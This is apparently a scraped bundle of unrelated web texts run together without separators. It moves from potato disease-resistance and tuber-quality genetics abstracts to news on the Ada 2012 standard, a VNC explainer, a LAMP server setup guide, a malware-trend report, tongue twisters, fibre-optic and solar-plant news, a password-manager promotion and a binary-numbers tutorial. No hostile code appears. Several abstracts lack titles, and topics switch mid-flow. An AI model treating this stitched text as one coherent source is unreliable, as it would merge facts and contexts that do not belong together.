Ballvora A.,Max Planck Institute for Plant Breeding Research |
Ballvora A.,University of Bonn |
Flath K.,Julius Kühn Institute |
Lubeck J.,SaKa Pflanzenzucht GmbH and Co. KG |
And 4 more authors.
Theoretical and Applied Genetics | Year: 2011
The obligate biotrophic, soil-borne fungus Synchytrium endobioticum causes wart disease of potato (Solanum tuberosum), which is a serious problem for crop production in countries with moderate climates. S. endobioticum induces hypertrophic cell divisions in plant host tissues, leading to the formation of tumor-like structures. Potato wart is a quarantine disease and chemical control is not possible. Of the 38 S. endobioticum pathotypes occurring in Europe, pathotypes 1, 2, 6 and 18 are the most relevant. Genetic resistance to wart is available, but only a few current potato varieties are resistant to all four pathotypes. The phenotypic evaluation of wart resistance is laborious, time-consuming and sometimes ambiguous, which makes breeding for resistance difficult. Molecular markers diagnostic for genes for resistance to S. endobioticum pathotypes 1, 2, 6 and 18 would greatly facilitate the selection of new, resistant cultivars. Two tetraploid half-sib families (266 individuals) segregating for resistance to S. endobioticum pathotypes 1, 2, 6 and 18 were produced by crossing a resistant genotype with two different susceptible ones. The families were scored for five different wart resistance phenotypes. The distribution of mean resistance scores was quantitative in both families. Resistance to pathotypes 2, 6 and 18 was correlated and independent of resistance to pathotype 1. DNA pools were constructed from the most resistant and most susceptible individuals and screened with genome-wide simple sequence repeat (SSR), inter-simple sequence repeat (ISSR) and randomly amplified polymorphic DNA (RAPD) markers. Bulked segregant analysis identified three SSR markers that were linked to wart resistance loci (Sen). Sen1-XI on chromosome XI conferred partial resistance to pathotype 1, Sen18-IX on chromosome IX to pathotype 18, and Sen2/6/18-I on chromosome I to pathotypes 2, 6 and 18. Additional genotyping with 191 single nucleotide polymorphism (SNP) markers confirmed the localization of the Sen loci. Thirty-three SNP markers linked to the Sen loci permitted the dissection of Sen alleles that increased or decreased resistance to wart. The alleles were inherited from both the resistant and susceptible parents. © 2011 The Author(s).
Targeted and untargeted approaches unravel novel candidate genes and diagnostic SNPs for quantitative resistance of the potato (Solanum tuberosum L.) to Phytophthora infestans causing the late blight disease
Mosquera T.,Max Planck Institute for Plant Breeding Research |
Mosquera T.,National University of Colombia |
Alvarez M.F.,Max Planck Institute for Plant Breeding Research |
Alvarez M.F.,National University of Colombia |
And 14 more authors.
PLoS ONE | Year: 2016
The oomycete Phytophthora infestans causes late blight of potato, which can completely destroy the crop. Therefore, for the past 160 years, late blight has been the most important potato disease worldwide. The identification of cultivars with high and durable field resistance to P. infestans is an objective of most potato breeding programs. This type of resistance is polygenic and therefore quantitative. Its evaluation requires multi-year, multi-location trials. Furthermore, quantitative resistance to late blight correlates with late plant maturity, a negative agricultural trait. Knowledge of the molecular genetic basis of quantitative resistance to late blight not compromised by late maturity is very limited. It is however essential for developing diagnostic DNA markers that facilitate the efficient combination of superior resistance alleles in improved cultivars. We used association genetics in a population of 184 tetraploid potato cultivars in order to identify single nucleotide polymorphisms (SNPs) that are associated with maturity corrected resistance (MCR) to late blight. The population was genotyped for almost 9000 SNPs from three different sources. The first source was candidate genes specifically selected for their function in the jasmonate pathway. The second source was novel candidate genes selected based on comparative transcript profiling (RNA-Seq) of groups of genotypes with contrasting levels of quantitative resistance to P. infestans. The third source was the first-generation 8.3k SolCAP SNP genotyping array available in potato for genome-wide association studies (GWAS). Twenty-seven SNPs from all three sources showed robust association with MCR. Some of those were located in genes that are strong candidates for directly controlling quantitative resistance, based on functional annotation. Most important were: a lipoxygenase (jasmonate pathway), a 3-hydroxy-3-methylglutaryl coenzyme A reductase (mevalonate pathway), a P450 protein (terpene biosynthesis), a transcription factor and a homolog of a major gene for resistance to P. infestans from the wild potato species Solanum venturii. The candidate gene approach and GWAS complemented each other as they identified different genes. The results of this study provide new insight into the molecular genetic basis of quantitative resistance in potato and a toolbox of diagnostic SNP markers for breeding applications. © 2016 Mosquera et al. This is an open access article distributed under the terms of the Creative Commons Attribution License, which permits unrestricted use, distribution, and reproduction in any medium, provided the original author and source are credited.
Urbany C.,Max Planck Institute for Plant Breeding Research |
Stich B.,Max Planck Institute for Plant Breeding Research |
Schmidt L.,Max Planck Institute for Plant Breeding Research |
Simon L.,Bavaria Saat BGB GmbH |
And 9 more authors.
BMC Genomics | Year: 2011
Background: Most agronomic plant traits result from complex molecular networks involving multiple genes and from environmental factors. One such trait is the enzymatic discoloration of fruit and tuber tissues initiated by mechanical impact (bruising). Tuber susceptibility to bruising is a complex trait of the cultivated potato (Solanum tuberosum) that is crucial for crop quality. As phenotypic evaluation of bruising is cumbersome, the application of diagnostic molecular markers would empower the selection of low-bruising potato varieties. The genetic factors and molecular networks underlying enzymatic tissue discoloration are sparsely known. To date, there has been no association study dealing with tuber bruising, and diagnostic markers for enzymatic discoloration are rare. Results: The natural genetic diversity for bruising susceptibility was evaluated in elite middle European potato germplasm in order to elucidate its molecular basis. Association genetics using a candidate gene approach identified allelic variants in genes that function in tuber bruising and enzymatic browning. Two hundred and five tetraploid potato varieties and breeding clones related by descent were evaluated for two years in six environments for tuber bruising susceptibility, specific gravity, yield, shape and plant maturity. Correlations were found between different traits. In total, 362 polymorphic DNA fragments, derived from 33 candidate genes and 29 SSR loci, were scored in the population and tested for association with the traits using a mixed model approach, which takes into account population structure and kinship. Twenty-one highly significant (p < 0.001) and robust marker-trait associations were identified. Conclusions: The observed trait correlations and associated marker fragments provide new insight into the molecular basis of bruising susceptibility and its natural variation. The markers diagnostic for increased or decreased bruising susceptibility will facilitate the combination of superior alleles in breeding programs. In addition, this study presents novel candidates that might control enzymatic tissue discoloration and tuber bruising. Their validation and characterization will increase the knowledge about the underlying biological processes. © 2011 Urbany et al; licensee BioMed Central Ltd.
Li L.,Max Planck Institute for Plant Breeding Research |
Li L.,Northeast Forestry University |
Tacke E.,Bioplant GmbH |
Hofferbert H.-R.,Bohm Nordkartoffel Agrarproduktion OHG |
And 5 more authors.
Theoretical and Applied Genetics | Year: 2013
Tuber yield, starch content, starch yield and chip color are complex traits that are important for industrial uses and food processing of potato. Chip color depends on the quantity of the reducing sugars glucose and fructose in the tubers, which are generated by starch degradation. Reducing sugars accumulate when tubers are stored at low temperatures. Early and efficient selection of cultivars with superior yield, starch yield and chip color is hampered by the fact that reliable phenotypic selection requires multi-year, multi-location trials. Application of DNA-based markers early in the breeding cycle, which are diagnostic for superior alleles of genes that control natural variation of tuber quality, will reduce the number of clones to be evaluated in field trials. Association mapping using genes functional in carbohydrate metabolism as markers has discovered alleles of invertases and starch phosphorylases that are associated with tuber quality traits. Here, we report on new DNA variants at loci encoding ADP-glucose pyrophosphorylase and the invertase Pain-1, which are associated with positive or negative effects on chip color, tuber starch content and starch yield. Marker-assisted selection (MAS) and marker validation were performed in tetraploid breeding populations, using various combinations of 11 allele-specific markers associated with tuber quality traits. To facilitate MAS, user-friendly PCR assays were developed for specific candidate gene alleles. In a multi-parental population of advanced breeding clones, genotypes were selected for having different combinations of five positive and the corresponding negative marker alleles. Genotypes combining five positive marker alleles performed on average better than genotypes with four negative alleles and one positive allele. When tested individually, seven of eight markers showed an effect on at least one quality trait. The direction of effect was as expected. Combinations of two to three marker alleles were identified that significantly improved average chip quality after cold storage and tuber starch content. In F1 progeny of a single-cross combination, MAS with six markers did not give the expected result. Reasons and implications for MAS in potato are discussed. © 2013 The Author(s).
Obidiegwu J.E.,Max Planck Institute for Plant Breeding Research |
Obidiegwu J.E.,National Root Crops Research Institute Umudike |
Sanetomo R.,Max Planck Institute for Plant Breeding Research |
Sanetomo R.,Obihiro University of Agriculture and Veterinary Medicine |
And 6 more authors.
BMC Genetics | Year: 2015
Background: The soil-borne, obligate biotrophic fungus Synchytrium endobioticum causes tumor-like tissue proliferation (wart) in potato tubers and thereby considerable crop damage. Chemical control is neither effective nor friendly to the environment. S. endobioticum is therefore a quarantined pathogen. The emergence of new pathotypes of the fungus aggravates this agricultural problem. The best control of wart disease is the cultivation of resistant varieties. Phenotypic screening for resistant cultivars is however time-, labor- and material-intensive. Breeding for resistance would therefore greatly benefit from diagnostic DNA markers that can be applied early in the breeding cycle. The prerequisite for the development of diagnostic DNA markers is the genetic dissection of the factors that control resistance to S. endobioticum in various genetic backgrounds of potato. Results: Progeny of a cross between a wart-resistant and a susceptible tetraploid breeding clone was evaluated for resistance to S. endobioticum pathotypes 1, 2, 6 and 18, the most relevant in Europe. The same progeny was genotyped with 195 microsatellite and 8303 single nucleotide polymorphism (SNP) markers. Linkage analysis identified the multi-allelic locus Sen1/RSe-XIa on potato chromosome XI as the major factor for resistance to all four S. endobioticum pathotypes. Six additional, independent modifier loci had smaller effects on wart resistance. Combinations of markers linked to Sen1/RSe-XIa resistance alleles with one to two additional markers were sufficient for obtaining high levels of resistance to S. endobioticum pathotypes 1, 2, 6 and 18 in the analyzed genetic background. Conclusions: Potato resistance to S. endobioticum is oligogenic with one major and several minor resistance loci. It is composed of multiple alleles for resistance and susceptibility that originate from multiple sources. The genetics of resistance to S. endobioticum therefore varies between different genetic backgrounds. The DNA markers described in this paper are the starting point for pedigree-based selection of cultivars with high levels of resistance to S. endobioticum pathotypes 1, 2, 6 and 18. © 2015 Obidiegwu et al.; licensee BioMed Central.
ISO Approves Ada 2012 Programming Language Standard
Ada is a structured, statically typed, imperative, wide-spectrum and object-oriented high-level computer programming language, extended from Pascal and other languages. It has strong built-in language support for explicit concurrency, offering tasks, synchronous message passing, protected objects and nondeterminism. Ada was originally designed by a team led by Jean Ichbiah of CII Honeywell Bull under contract to the United States Department of Defense from 1977 to 1983 to supersede the hundreds of programming languages then used by the DOD. The language was named after Ada Lovelace, a mathematician who is sometimes regarded as the world's first programmer because of her work with Charles Babbage; she was also the daughter of the poet Lord Byron. Fittingly, the Ada 2012 standard announcement came just days after Lovelace's Dec. 10 birthday.

Ada was originally targeted at embedded and real-time systems. The Ada 95 revision, designed by S. Tucker Taft of Intermetrics in the early 1990s, improved support for systems, numerical, financial and object-oriented programming (OOP). Ada is designed for the development of very large software systems. Ada packages can be compiled separately, and their specifications can also be compiled separately without the implementation to check for consistency. This makes it possible to detect problems early during the design phase, before implementation starts. The Ada programming language is designed for large, long-lived applications, and embedded systems in particular, where reliability and efficiency are essential.

ISO and the International Electrotechnical Commission (IEC) are the two primary organizations for international standardization. They resolve the problem of overlapping scope by forming a Joint Technical Committee, JTC1, to deal with all standardization in the scope of information technology. JTC1 deals with its large scope of work by subdividing the responsibility among a number of subcommittees. SC22, which deals with programming languages, their environments and system software interfaces, is the parent body of WG9. In turn, SC22 subdivides its scope of work among several Working Groups. WG9 is responsible for the "development of ISO standards for programming language Ada." That gives you ISO/IEC JTC1/SC22/WG9.

The formal approval of the standard was issued Nov. 20 by ISO/IEC JTC 1, and the standard was published Dec. 15. A technical summary of Ada 2012, together with an explanation of the language's benefits and a set of links to further information, is available at www.ada2012.org, which the Ada Resource Association maintains.
The language revision, known as Ada 2012, was under the auspices of ISO/IEC JTC1/SC22/WG9 and was conducted by the Ada Rapporteur Group (ARG) subunit of WG9, with sponsorship in part from the ARA and Ada-Europe.
What is virtual network computing?
- By William Jackson
- Feb 25, 2014
Developed in the 1990s by researchers at the Olivetti & Oracle Research Laboratory at Cambridge, UK, virtual network computing was envisioned as an “ultra-thin client system” that would give users remote access not only to applications and data but also to a desktop environment.
“VNC thus provides mobile computing without requiring the user to carry any device whatsoever,” its creators wrote in a 1998 paper.
Thin clients have come and gone, and nearly everyone today is carrying a mobile device anyway, but because of the lightweight Remote Frame Buffer (RFB) protocol on which it is built, VNC has found a large niche as a remote access tool.
“It is the simplicity of this protocol that makes VNC so powerful,” the developers wrote. “Unlike other remote display protocols such as the X Window System and Citrix’s ICA, the VNC protocol is totally independent of the operating system, windowing system and applications.”
AT&T acquired the Cambridge lab in 1999 and halted research in 2002, and four of the developers (Tristan Richardson, Andy Harter, James Weatherall and Andy Hopper) formed RealVNC to take the open source software in-house and develop it commercially. Open source versions remain available.
VNC consists of server software installed on a remote computer that will be shared, and client viewer software installed on another computer that will access the desktop. The viewer connects to a port on the server, and the RFB protocol enables access to and remote control of a graphical user interface. Although the protocol can help reduce overhead and latency, a broadband connection is required for it to work well.
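To get a feel for how lightweight RFB is, here is a minimal sketch (Python; the host address is an assumption, and a VNC server must be listening on the default RFB port, 5900). The server speaks first, sending a 12-byte protocol version string:

import socket

# Hypothetical host running a VNC server; 5900 is the default RFB port.
HOST, PORT = "192.168.1.50", 5900

with socket.create_connection((HOST, PORT), timeout=5) as sock:
    # An RFB server opens the conversation with a 12-byte ProtocolVersion
    # message, e.g. b"RFB 003.008\n", before any authentication happens.
    version = sock.recv(12)
    print("Server protocol version:", version.decode("ascii").strip())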
William Jackson is a Maryland-based freelance writer.
If you’re running an open source server in the gBlock cloud, you are probably already familiar with a LAMP stack. If you haven’t used one before, LAMP is a web application and deployment stack that is very common and simple to install and use on your virtual machines. This blog will walk you through a LAMP installation so you can get development cranking.
LAMP stands for Linux, Apache Web server, MySQL database, and Perl, Python, or PHP, all common tools for administrators and developers. As LAMP has become more and more common, software extensions have been created that facilitate these different tools working together.
As far as how they do work together, a user accessing your Apache web server will call up your applications and files, which are located on attached storage. The web server delivers code that is created in Perl/Python/PHP, which in turn references the MySQL database.
OK, ready to get started? The first step is to grab the packages and configure your quotas.
1) Add packages with
# yum install wget bzip2 unzip zip nmap openssl fileutils ncftp gcc gcc-c++
Next, if you have not already, enable quotas on your server. In Red Hat, while logged in as root, use a text editor to edit the /etc/fstab file. Add the usrquota and/or grpquota options to the file systems that require quotas.
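For example, a quota-enabled entry might look like the following (the device name and file system type here are placeholders; match them to the existing lines in your own fstab):

/dev/VolGroup00/LogVol02 /home ext3 defaults,usrquota,grpquota 1 2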
Run quotacheck to create a table of quota-enabled file systems with current disk usage. For example,
# quotacheck -cug /home

will create quota files in the /home directory, with -c creating them for each file system, -u specifying user quotas, and -g specifying group quotas.
You can also type edquota and a user name to launch your default editor and edit the quotas for an individual user directly. This will set disk limits. Do this for each user that requires a quota. The system will display the blocks used, the soft and hard block limits, and the same figures for inodes. Hard limits are the maximum amount of disk space allotted to that user, while soft limits may be exceeded for a period of time. Set this grace period by entering
# edquota -t
2) Install MySQL
# yum install mysql-devel mysql-server
# chkconfig --level 2345 mysqld on
# /etc/init.d/mysqld start
Check that networking is enabled. Run:
# netstat -tap | grep mysql
It should show a line like this:
[root@server1 named]# netstat -tap | grep mysql
tcp 0 0 *:mysql *:* LISTEN 2470/mysqld
If it does not, edit /etc/my.cnf and comment out the option skip-networking:
# vi /etc/my.cnf
#skip-networking
# /etc/init.d/mysqld restart
Set a password using one of these methods:
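Both of the following were standard on MySQL 5.x-era systems (substitute a password of your own). From the shell:

# mysqladmin -u root password 'new_password'

Or from within the MySQL client:

mysql> SET PASSWORD FOR 'root'@'localhost' = PASSWORD('new_password');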
Create additional database users:
mysql> CREATE USER 'monty'@'localhost' IDENTIFIED BY 'some_pass';
mysql> GRANT ALL PRIVILEGES ON *.* TO 'monty'@'localhost'
    -> WITH GRANT OPTION;
Alternatively you can run:
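One common choice here (assuming it shipped with your MySQL packages, as it did on CentOS/Red Hat systems of this era) is the bundled hardening script, which sets the root password and removes anonymous accounts and the test database:

# mysql_secure_installation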
3) Install Apache2 with PHP
To get started installing Apache2 with PHP, enter:
# yum install httpd mod_ssl php php-devel php-gd php-imap php-ldap php-mysql php-odbc php-pear php-xml php-xmlrpc curl curl-devel perl-libwww-perl ImageMagick libxml2 libxml2-devel
Change the directory index to include PHP pages:

# vi /etc/httpd/conf/httpd.conf

[...] DirectoryIndex index.html index.htm index.shtml index.cgi index.php index.php3 index.pl [...]
# chkconfig httpd on
# /etc/init.d/httpd start
Edit httpd.conf to hide the Apache version information:

# vi /etc/httpd/conf/httpd.conf
ServerSignature Off

(ServerSignature Off removes the version footer from server-generated pages; adding ServerTokens Prod also trims the version details from the Server response header.)
Edit sysctl.conf to enable SYN cookies protection:
# Enable TCP SYN Cookie Protection
net.ipv4.tcp_syncookies = 1
Restart the network server:
# service network restart
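Alternatively, running # sysctl -p applies the settings in /etc/sysctl.conf immediately, without restarting networking.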
Configure Mod_Evasive. Mod_Evasive offers Apache protection against DDoS.
# cd /root
# wget http://www.zdziarski.com/projects/mod_evasive/mod_evasive_1.10.1.tar.gz
# tar zxf mod_evasive_1.10.1.tar.gz
# cd mod_evasive
# /usr/sbin/apxs -cia mod_evasive20.c

Then add the mod_evasive directives to httpd.conf:

# vi /etc/httpd/conf/httpd.conf

DOSHashTableSize 3097
DOSPageCount 2
DOSSiteCount 50
DOSPageInterval 1
DOSSiteInterval 1
DOSBlockingPeriod 10
Add vsftpd (if necessary). This enables secure FTP access to your web server.
# yum install vsftpd
# vi /etc/vsftpd/vsftpd.conf
Disable anonymous logins. In /etc/vsftpd/vsftpd.conf, around the 12th line, change the anonymous_enable setting to:
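anonymous_enable=NO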
Save the vsftpd.conf file and restart the daemon:
# service vsftpd restart
# chkconfig --level 235 vsftpd on
# service vsftpd start
With this default configuration, the users' FTP directory will be set to their home directory.
4) Set up PHPMyAdmin
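The exact steps depend on your repositories; as a minimal sketch, assuming the EPEL repository provides the phpMyAdmin package for your release:

# yum install epel-release
# yum install phpMyAdmin
# vi /etc/httpd/conf.d/phpMyAdmin.conf

Edit the access directives in that file to allow connections from your workstation's IP address, then restart Apache:

# service httpd restart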
You should now have all the tools you need for a fully loaded LAMP stack. Happy developing!
The report, from Blue Coat Systems, which tapped the data pool generated by its WebPulse security service, says that hackers are developing broader attack strategies, including complex blended threats, faster malware lifecycles and search engine manipulation.
According to Blue Coat, malware is now being adapted by hackers in relatively rapid lifecycles: the report notes that the average lifespan of a typical piece of malware dropped from seven hours in 2007 to just two in 2009.
As a result of this faster malware lifecycle, the study says that defences that require patches and downloads are simply unable to keep pace.
Increased reliance on social networking for communication, says Blue Coat, means there is less reliance on web-based email, which dropped in popularity from fifth place in 2008 to ninth place in 2009.
And, the report adds, exploiting user trust drives the most common threats. The two most common web-based threats in 2009 – the fake antivirus software and the fake video codec – both exploited user trust in the internet, search engines and social networks.
According to Blue Coat, these were not the 'drive-by' attacks of recent years, nor did they require a vulnerability to exploit other than human behaviour.
Chris Larsen, senior malware researcher at Blue Coat, said that the increasing use of link farms to manipulate search engine results and prey on the trust users have in their internet experience drove many of the malware exploits his researchers saw in 2009 and are continuing to see in 2010.
"To provide comprehensive protection in the face of these threats, enterprises need not only a layered defence but also better user education", he said.
"The web is growing too fast in all directions for human raters or even web crawlers to manage. It is turning into a war of machines, and the best defences are able to leverage the strength-in-numbers principle to protect users", he added
The information in the report is based on an analysis of data collected from the Blue Coat WebPulse service, a cloud-based collaborative defence facility that is billed as having 62 million users around the world.
Tongue Twisters - Collection of Tongue Twisters
We are sharing some popular tongue twisters with you in this article. If you know of other tongue twisters, feel free to share them in the comments for others to view, and let's make this article the world's largest collection of tongue twisters.
A tongue-twister is a phrase that is designed to be difficult to articulate properly. Tongue-twisters may rely on similar but distinct phonemes, unfamiliar constructs in loanwords, or other features of a language. Many tongue-twisters use a combination of alliteration and rhyme. They have two or three sequences of sounds, then the same sequences of sounds with some sounds exchanged. For example, She sells sea shells on the sea shore. The shells that she sells are sea shells I'm sure.
Collection of Tongue Twisters
- If you understand, say "understand". If you don't understand, say "don't understand". But if you understand and say "don't understand". How do I understand that you understand? Understand!
- I wish to wish the wish you wish to wish, but if you wish the wish the witch wishes, I won't wish the wish you wish to wish.
- Sounding by sound is a sound method of sounding sounds.
- A sailor went to sea to see, what he could see. And all he could see was sea, sea, sea.
- Purple Paper People, Purple Paper People, Purple Paper People.
- If two witches were watching two watches, which witch would watch which watch?
- I thought a thought but the thought I thought wasn't the thought I thought. I thought if the thought I thought had been the thought I thought, I wouldn't have thought so much.
- Once a fellow met a fellow in a field of beans. Said a fellow to a fellow, "If a fellow asks a fellow, can a fellow tell a fellow what a fellow means?"
- Mr. Inside went over to see Mr. Outside. Mr. Inside stood outside and called to Mr. Outside inside.
- Mr. Outside answered Mr. Inside from inside and told Mr. Inside to come inside. Mr. Inside said "NO", and told Mr. Outside to come outside.
- Mr. Outside and Mr. Inside argued from inside and outside about going outside or coming inside. Finally, Mr. Outside coaxed Mr. Inside to come outside; then both Mr. Outside and Mr. Inside went outside to the riverside.
- She sells sea shells on the sea shore. The shells that she sells are sea shells I'm sure.
- The owner of the inside inn was inside his inside inn with his inside outside his inside inn.
- If one doctor doctors another doctor, does the doctor who doctors the doctor doctor the doctor the way the doctor he is doctoring doctors? Or does he doctor the doctor the way the doctor who doctors doctors?
- When a doctor falls ill, another doctor doctors the doctor. Does the doctor doctoring the doctor doctor the doctor in his own way, or does the doctor doctoring the doctor doctor the doctor in the doctor's way?
- We surely shall see the sun shine shortly. Whether the weather be fine, or whether the weather be not, Whether the weather be cold Or whether the weather be hot, We'll weather the weather Whatever the weather, Whether we like it or not.
- Whether the weather is hot or whether the weather is cold. Whether the weather is either or not, It is whether we like it or not.
- Nine nice night nurses nursing nicely.
- A flea and a fly in a flue were imprisoned, so what could they do? Said the fly, "Let us flee!" "Let us fly!" said the flea. So they flew through a flaw in the flue.
- If you tell Tom to tell a tongue-twister his tongue will be twisted as tongue-twister twists tongues.
- Mr. See owned a saw and Mr. Soar owned a seesaw. Now See's saw sawed Soar's seesaw Before Soar saw See, Which made Soar sore. Had Soar seen See's saw Before See sawed Soar's seesaw; See's saw would not have sawed Soar's seesaw. So See's saw sawed Soar's seesaw. But it was sad to see Soar so sore just because See's saw sawed Soar's seesaw.
Please feel free to share more tongue twisters in your comments below.
A year ago, we talked about reaching for Terabit Ethernet, the next power-of-10 increase in speed over the state of the art today. Now, researchers have demonstrated one way to do that.
In a paper published in the Feb. 16 edition of Optics Express, the researchers detail their approach for de-multiplexing signals at high speeds, claiming that they were able to achieve 640Gbps over fiber-optic lines with no errors.
The material they used in the chip is chalcogenide, and Australian researchers were talking about the high-speed networking possibilities of the material last summer. Calling it "just a piece of scratched glass," they said it could potentially be cheap to produce.
At these bit rates, the researchers say that it is only possible to perform switching with an all-optical system, using optical time-division multiplexing. And chalcogenide allows for "femtosecond response time" (now that's fast). The nature of the material means that it only needs to be 5 centimeters long for it to work, so it's nicely compact.
Recently, Sreedhar Kajeepeta, a CTO at CSC, wrote about how Terabit Ethernet could be used. Presumably, it would not just be used for aggregating lower-speed links, but would inspire us to reach higher, to new applications, perhaps to something called Augmented Reality, in which real-life video and audio are combined with virtual video and audio.
History has taught us that we will find a way to fill up the pipe, but don't look for Terabit Ethernet to your desktop anytime soon.
Will passwords soon become a thing of the past? Have they already become obsolete? This is perhaps one of the most prominent topics under discussion in the technical media these days.
A couple of weeks ago, Forbes.com published a story about the probable public launch of U2F (Universal Second Factor) – a new form of authentication by Google in alliance with Yubico. Through U2F, Google wants “to help move the web towards easier and stronger authentication, where web users can own a single easy-to-use secure authentication device built on open standards, which works across the entire web.” Media reports following the story have fuelled wild speculations that traditional passwords will soon die.
U2F is creating quite a stir, just like the buzz created by the “Passwords are dead” session at the RSA conference in San Francisco earlier this year. Meanwhile, the Petition Against Passwords movement gained widespread, global media attention last summer. Launched by a group of companies selling password-less technology, the online petition is being used to “collect every frustrated yell at forgotten passwords and make sure the organizations responsible hear them.”
Of course, people have been speculating on the death of passwords for almost a decade. Microsoft Chairman Bill Gates predicted the death of passwords in 2004 and then again in 2006, when he said that the end of passwords was in sight. Gates isn’t alone. Many other luminaries and industry analysts have long been predicting the disappearance of passwords. Still, passwords continue to be the most prominent method of authentication.
The grievance against passwords
With the proliferation of online applications, passwords now occupy every aspect of our lives. Remembering dozens of passwords is impossible. Storing them only invites trouble. And managing them manually is a pain.
With high-profile security breaches involving stolen online identities, all of us want to be rid of passwords. These security breaches also invite discussions on password replacement and raise the million-dollar question: do we have viable alternatives if passwords finally die?
Alternatives abound, but none viable
Alternatives to passwords, such as biometric authentication, iris authentication, facial authentication, various forms of multi-factor authentications, and even authentication through items like watches, jewelry, and electronic tattoos, are all being discussed.
A couple of months ago, Apple launched the Touch ID fingerprint sensor, which was built into the iPhone 5S. Touch ID allows users to access their phones with a press of the finger, “without the need to remember complex sequences of letters or numbers”. The launch of Touch ID also made the media promptly talk about the disappearance of passwords.
Interestingly, some of these alternative authentication methods have been cracked even before they could be adopted widely. A few years ago, a group of researchers hacked faces in biometric facial authentication systems by using phony photos of legitimate users.
Active research is also on to formulate better alternatives.
However, none of the alternative approaches have been viable so far for various reasons. Passwords are very easy to create and are absolutely free. The alternatives, on the other hand, are typically expensive, difficult to integrate with existing environments, difficult to use, and require additional hardware components.
Passwords are here to stay; protect them
For now, a viable replacement for traditional passwords is not in sight. When the next generation of password-replacing security technologies does emerge, it’s going to take a while for them to be widely accepted and adopted. All of which means that passwords are going to be around for a while.
Passwords are commonly perceived to be not secure and a burden. While worrying over the pain points, we overlook the actual problem. The actual problem is poor password management, not the passwords themselves.
Unable to remember strong passwords, users tend to use and reuse simple passwords everywhere. They store passwords in text files and post-it notes, share credentials among team members, and reveal secure login details in emails and by word of mouth. Real access controls do not exist and passwords to sensitive resources and applications remain unchanged for ages. Such bad password management practices invite security issues and other problems.
Use a password manager
While the research is on to find an alternative to passwords, it would be prudent to deploy a password manager to safeguard your data. With a password manager, you can secure all your passwords in a centralized repository; use strong, unique passwords without worrying about remembering them; automate and enforce password management best practices; control access to resources and applications; keep track of activities; and do much more.
If you are wondering which password manager to use, take a look at ManageEngine Password Manager Pro.
World’s Largest Solar Thermal Plant Joins California's Grid
February 18, 2014
On Feb. 13, 2014, the Ivanpah Solar Electric Generating System was declared operational and began delivering solar electricity to California customers.
At full capacity, the facility’s trio of 450-foot high towers produces a gross total of 392 megawatts (MW) of solar power, which is enough electricity to provide 140,000 California homes with clean energy and avoid 400,000 metric tons of carbon dioxide per year, equal to taking 72,000 vehicles off the road.
Ivanpah, which is a joint effort between NRG Energy, Google and BrightSource Energy, accounts for nearly 30 percent of all solar thermal energy currently operational in the U.S., and is the largest solar project of its kind in the world.
The project is the first to use BrightSource’s solar power tower technology to produce electricity; the system includes 173,500 heliostats that follow the sun’s trajectory, solar field integration software and a solar receiver steam generator.
The solar energy harnessed from Ivanpah’s Units 1 and 3 is being sold to Pacific Gas & Electric under two long-term power purchase agreements, while the electricity from Unit 2 is being sold to Southern California Edison under a similar contract.
I figured what better day than January 11th, 2011 (1/11/11) than to write this long overdue post on binary numbers.
Binary numbers are one of the fundamental things to computer science that need to be understood before moving onto the more complicated things. It’s a system of math and once it clicks, it will open up a lot of other things like understanding logic gates on up to and beyond the technical aspects of networking.
Your normal system of math is base 10, meaning you have ten different options for what a digit might be: 0, 1, 2, 3, 4, 5, 6, 7, 8, or 9. The binary system is base 2, meaning you have two different options for a digit: 0 or 1. It’s a lot like other boolean choices: true or false. What do you call a carbonated beverage: Pop or Soda? Which do you prefer, Pepsi or Coke? (The correct answers are Pop and Pepsi, respectively.)
In the name of fun, Coca-Cola and Pepsi help us out by having their own flavors that fit nicely into this explanation: Coke Zero and Pepsi One. So, let’s learn (or review) the basics of Binary Systems using these flavors as pop; Coke Zero as zero and Pepsi One as one.
Each can is a bit.
8 cans would be 8 bits.
8 bits also equal 1 byte.
Each can may either have the value of a one…
or a zero.
Let’s count from 0 to 7 in binary. Then I’ll explain how it works.
Seven is the highest we can count to with only 3 bits. The formula for determining the highest value is 2^x - 1, where x is the number of bits you have. In this case: 2^3 = 8, and 8 - 1 = 7.
Just like the base 10 number 453 is equal to 4*100 + 5*10 + 3*1, the same carries over to the binary system. In the binary number 7 above, it’s 1*4 + 1*2 + 1*1.
The value of the right-most bit, also known as the Least Significant Bit, is 2^0 multiplied by the one or zero that is there. 2^0 = 1, so:
The next bit to the left has the value of 2^1 or 2, so:
The third bit, in this case the Most Significant Bit, is 2^2 or 4, so:
2^2*0 = 0
2^2*1 = 4
So, the last example (7) is 4 + 2 + 1 = 7. The pattern continues so with 4 bits, the most significant bit would be equal to 2^3 or 8, and so on.
Here’s the value zero. In decimal: 0. In binary: 00
In pop cans:
And here’s the value two. In decimal: 2. In binary: 10
In pop cans:
Here’s a quick tip: If the Least Significant Bit (remember, the one all the way to the right) is a zero, the number is even. If the LSB is a 1, your number will be odd.
This continues on up to however many bits you have, from four bits…
on up to 11 bits and beyond.
Perhaps you’ve heard of 32-bit and 64-bit operating systems and now understand how a 64-bit OS has greater addressability over a 32-bit OS.
Decimal, Binary, and Beyond?
Decimal gives you a choice of 10 different numbers that can fill a place and binary gives you a choice of two. What if we introduced a third number to binary to make it trinary (more commonly called ternary, or base 3)? A number’s place could either be zero, one, or two. (Perhaps we could use a Coke II for that role.) In that case, the same pattern would emerge:
To convert to decimal, the values would be:
3^0 * x for the first place, 3^1 * x for the second place, 3^2 * x for the third place, and so on, where x is the digit (0, 1, or 2) in that place.
What if we made a number system that had more than ten possible digits? Well, there’s already a common one around called hexadecimal that uses 16 characters. In hexadecimal, there are 16 options for each place. It can either be: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E, or F. You may recognize this as something you’ve seen before. Different computer codes use hexadecimal regularly, like a network card’s MAC address or HTML color codes.
To convert to decimal, the values for hexadecimal would be:
16^0 * x for the first place, 16^1 * x for the second place, and so on, where x is the value of the hex digit (0 through 15).
A hexadecimal digit can also be thought of as a four-bit binary number. For example, 1010 in binary would equal A (or 10 in decimal):
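If you want to check any of this yourself, here is a small sketch in Python (using only built-ins) that mirrors the hand conversions above; the to_decimal function is just the place-value formula from earlier:

# Convert a string of bits to decimal the way we did by hand:
# each bit is multiplied by 2 raised to its position, right to left.
def to_decimal(bits):
    total = 0
    for position, bit in enumerate(reversed(bits)):
        total += int(bit) * (2 ** position)
    return total

print(to_decimal("111"))   # 4 + 2 + 1 = 7
print(to_decimal("1010"))  # 8 + 0 + 2 + 0 = 10

# Python's built-in conversions agree, and handle hexadecimal too:
print(int("1010", 2))      # 10
print(bin(10))             # 0b1010
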